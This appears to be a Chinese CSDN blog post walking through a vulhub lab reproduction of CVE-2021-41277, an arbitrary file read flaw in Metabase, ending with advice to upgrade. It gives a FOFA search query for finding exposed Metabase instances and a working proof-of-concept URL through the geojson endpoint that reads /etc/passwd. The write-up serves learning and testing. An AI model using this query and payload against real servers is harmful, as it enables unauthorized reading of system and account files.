vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现

本文详细描述了如何在vulhub靶场复现Metabase的CVE-2021-41277信息泄露漏洞,包括环境搭建、账号注册、漏洞利用方法(通过抓包获取passwd文件内容)以及修复建议——及时升级到最新版本以防止进一步攻击。
摘要由CSDN通过智能技术生成

vulhub靶场漏洞复现
CVE-2021-41277 Metabase 信息泄露漏洞复现
fofa语法:

app="Metabase"

环境搭建:

cd vulhub/metabase/CVE-2021-41277
docker-compose up -d    》》打开dockers容器
docker ps -a   》》》查看开放的端口
ipconfig    >>>查看地址
yourip::3000/setup   》》》地址加端口查看服务

在这里插入图片描述

注册一个账号,邮箱什么随便输入,如图
在这里插入图片描述
跳过数据库填写
在这里插入图片描述
最后一步完成操作,然后进入这个页面,如图:
在这里插入图片描述poc:http://your-ip:3000/api/geojson?url=file:etc/passwd etc/passwd 》》这个文件存放着所有用户账号的信息。可以使用 cat /etc/passwd 命令查看该文件内容. /etc/shadow 》》》用于存储 Linux 系统中用户的密码信息,又称为“影子文件”。

etc中有一个passwd 文件,存储了系统中所有用户的基本信息,但由于该文件允许所有用户读取,易导致用户密码泄露,因此 Linux 系统将用户的密码信息从 /etc/passwd 文件中分离出来,并单独放到了此文件中。
漏洞复现:
打开抓包软件,对输入poc的页面进行抓包,并发送数据包即可达成任意文件读取的目的。
在这里插入图片描述

复现结束。
总结及修复建议
修复建议:根据影响版本的信息查看,并升级到最新版本

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值